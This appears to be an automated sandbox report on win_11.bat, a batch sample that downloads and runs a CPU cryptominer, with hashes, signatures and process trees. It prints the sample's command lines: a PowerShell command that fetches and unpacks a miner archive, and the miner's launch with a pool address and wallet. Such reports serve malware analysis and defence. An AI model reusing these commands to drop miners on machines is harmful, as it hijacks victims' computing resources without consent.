Analysis
- max time kernel: 1798s
- max time network: 1780s
- platform: windows10-1703_x64
- resource: win10-20230621-en
- resource tags: arch:x64, arch:x86, image:win10-20230621-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 30-06-2023 14:47
Static task: static1
Behavioral tasks:
- behavioral1: sample win.bat, resource win10-20230621-en
- behavioral2: sample win_1.bat, resource win10-20230621-en
- behavioral3: sample win_10.bat, resource win10-20230621-en
- behavioral4: sample win_11.bat, resource win10-20230621-en
- behavioral5: sample win_2.bat, resource win10-20230621-en
- behavioral6: sample win_3.bat, resource win10-20230621-en
- behavioral7: sample win_4.bat, resource win10-20230621-en
- behavioral8: sample win_5.bat, resource win10-20230621-en
- behavioral9: sample win_6.bat, resource win10-20230621-en
- behavioral10: sample win_7.bat, resource win10-20230621-en
- behavioral11: sample win_8.bat, resource win10-20230621-en
- behavioral12: sample win_9.bat, resource win10-20230621-en
General
- Target: win_11.bat
- Size: 706B
- MD5: ddc05c409f627a4382bff4c3a49423df
- SHA1: 0f77ae481593bc1b0669dae7a044d0b96f39413f
- SHA256: 6daf93d284bd5d39f613d6d3f96c083d1b99baa10e7acbf65f74ab84fe551887
- SHA512: 0bdfacc137a0f40cfffa34d3549961fe20dc35905e14a9b5c207cab380594dff09dfe641a534fb0d3211bcce3b727801df8c7c635fbc9c0cd26d6e7914818cc3
Malware Config
- Extracted: https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow 2, pid 372, powershell.exe; flow 4, pid 372, powershell.exe
- Executes dropped EXE (1 IoC)
  pid 4372, cpuminer-sse2.exe
- yara_rule upx (packed binary)
  matched behavioral4/files/0x000600000001af5d-277.dat, behavioral4/files/0x000600000001af5d-278.dat, and repeated memory dumps of pid 4372 (cpuminer-sse2.exe) at 0x00007FF74F3A0000-0x00007FF74FA1D000
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid 372 powershell.exe (3 hits); pid 1364 powershell.exe (3 hits)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token SeDebugPrivilege: pid 372 powershell.exe; Token SeDebugPrivilege: pid 1364 powershell.exe; Token SeLockMemoryPrivilege: pid 4372 cpuminer-sse2.exe (2 hits)
- Suspicious use of WriteProcessMemory (6 IoCs)
  PID 4696 (cmd.exe) wrote to memory of 372 (procid_target 67, 2 hits); PID 4696 (cmd.exe) wrote to memory of 1364 (procid_target 68, 2 hits); PID 4696 (cmd.exe) wrote to memory of 4372 (procid_target 69, 2 hits)
Processes
- C:\Windows\system32\cmd.exe (PID 4696)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win_11.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 372)
    Command line: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip', 'cpuminer-opt-win.zip')"
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1364)
    Command line: powershell -command "Expand-Archive -Force -Path cpuminer-opt-win.zip -DestinationPath cpuminer-opt"
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe (PID 4372)
    Command line: .\cpuminer-sse2.exe -a cpupower -o stratum+tcp://cpupower.eu.mine.zpool.ca:6240 -u oHyVvSQ3HDCgrM7MSJNzWmisqohcssm15C -p -c=OMEGA
    Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken